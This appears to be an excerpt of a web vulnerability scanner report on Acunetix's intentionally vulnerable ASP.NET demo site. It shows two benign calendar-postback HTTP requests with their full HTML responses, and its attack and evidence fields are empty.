Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1181 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,181 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8292&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgBAMxHkldoIZGRktp04mzxOPBggx6eV2v9fJcTiXTo%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLQxIKuBwLtiZ78CwLHkIz%2BDgKK%2BZ%2FNDAKK%2BZ%2FNDAKK%2BbPgBQKK%2BbPgBQKK%2BaeHDQKK%2BaeHDQKK%2BZvsCwKK%2BZvsCwKK%2BY%2BDAwKK%2BY%2BDAwK%2Fk%2FvECQK%2Fk%2FvECQK%2Fk%2B%2BbAQK%2Fk%2B%2BbAQK%2Fk4O%2BCgK%2Fk4O%2BCgK%2Fk7fVAwK%2Fk7fVAwK%2Fk6voDAK%2Fk6voDAK%2Fk9%2BMBAK%2Fk9%2BMBAK%2Fk%2FOjDQK%2Fk%2FOjDQK%2Fk%2BfGBgK%2Fk%2BfGBgK%2Fk9uvAwK%2Fk9uvAwK%2Fk8%2FCDAK%2Fk8%2FCDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV%2BAkCkLqV%2BAkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgApqTweND8%2FRvXhqtLaftci4cq5YZ
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:26:28 GMT Content-Length: 12635
Response Body - size: 12,635 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgBAMxHkldoIZGRktp04mzxOPBggx6eV2v9fJcTiXTo=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLQxIKuBwLtiZ78CwLHkIz+DgKK+Z/NDAKK+Z/NDAKK+bPgBQKK+bPgBQKK+aeHDQKK+aeHDQKK+ZvsCwKK+ZvsCwKK+Y+DAwKK+Y+DAwK/k/vECQK/k/vECQK/k++bAQK/k++bAQK/k4O+CgK/k4O+CgK/k7fVAwK/k7fVAwK/k6voDAK/k6voDAK/k9+MBAK/k9+MBAK/k/OjDQK/k/OjDQK/k+fGBgK/k+fGBgK/k9uvAwK/k9uvAwK/k8/CDAK/k8/CDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV+AkCkLqV+AkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgApqTweND8/RvXhqtLaftci4cq5YZ" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">September 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8289')" style="color:Black" title="September 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8290')" style="color:Black" title="September 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8291')" style="color:Black" title="September 13">13</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8292')" style="color:White" title="September 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8293')" style="color:Black" title="September 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8294')" style="color:Black" title="September 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8295')" style="color:Black" title="September 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8296')" style="color:Black" title="September 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8297')" style="color:Black" title="September 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8298')" style="color:Black" title="September 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8299')" style="color:Black" title="September 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8300')" style="color:Black" title="September 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8301')" style="color:Black" title="September 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8302')" style="color:Black" title="September 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1135 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,135 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8448&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgBApOl5ENsIZGRka321dk2K15oHaNAGoW%2Ff65nHWKM%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLqyP6VBALQp5LlBALTp%2BrACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna%2F1AgLmna%2F1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ%2FmBQLmnZ%2FmBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY%2FcDALmnY%2FcDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE%2FAvukoT8C%2B6TV0wkC%2B6TV0wkC%2B6TJ9gIC%2B6TJ9gIC%2B6T9jQoC%2B6T9jQoC%2B6SRoAMC%2B6SRoAMC%2B6SFxwwC%2B6SFxwwC%2B6T5rAkC%2B6T5rAkC%2B6TtwwIC%2B6TtwwIC3Mv%2F6AUC3Mv%2F6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7%2BQ8C3Mu7%2BQ8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6%2BoCAtzL6%2BoCAtzL39MPAtzL39MPAtzL8%2FYIAtzL8%2FYIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBXvGED63t3WymbopnG4E4wrMgRbM
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:36:33 GMT Content-Length: 12583
Response Body - size: 12,583 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgBApOl5ENsIZGRka321dk2K15oHaNAGoW/f65nHWKM=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLqyP6VBALQp5LlBALTp+rACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna/1AgLmna/1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ/mBQLmnZ/mBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY/cDALmnY/cDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE/AvukoT8C+6TV0wkC+6TV0wkC+6TJ9gIC+6TJ9gIC+6T9jQoC+6T9jQoC+6SRoAMC+6SRoAMC+6SFxwwC+6SFxwwC+6T5rAkC+6T5rAkC+6TtwwIC+6TtwwIC3Mv/6AUC3Mv/6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7+Q8C3Mu7+Q8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6+oCAtzL6+oCAtzL39MPAtzL39MPAtzL8/YIAtzL8/YIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBXvGED63t3WymbopnG4E4wrMgRbM" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">February 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8436')" style="color:Black" title="February 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8437')" style="color:Black" title="February 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8438')" style="color:Black" title="February 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8439')" style="color:Black" title="February 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8440')" style="color:Black" title="February 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8441')" style="color:Black" title="February 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8442')" style="color:Black" title="February 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8443')" style="color:Black" title="February 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8444')" style="color:Black" title="February 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8445')" style="color:Black" title="February 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8446')" style="color:Black" title="February 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8447')" style="color:Black" title="February 16">16</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8448')" style="color:White" title="February 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8449')" style="color:Black" title="February 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8450')" style="color:Black" title="February 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8451')" style="color:Black" title="February 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8452')" style="color:Black" title="February 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8453')" style="color:Black" title="February 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8454')" style="color:Black" title="February 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8455')" style="color:Black" title="February 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8456')" style="color:Black" title="February 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
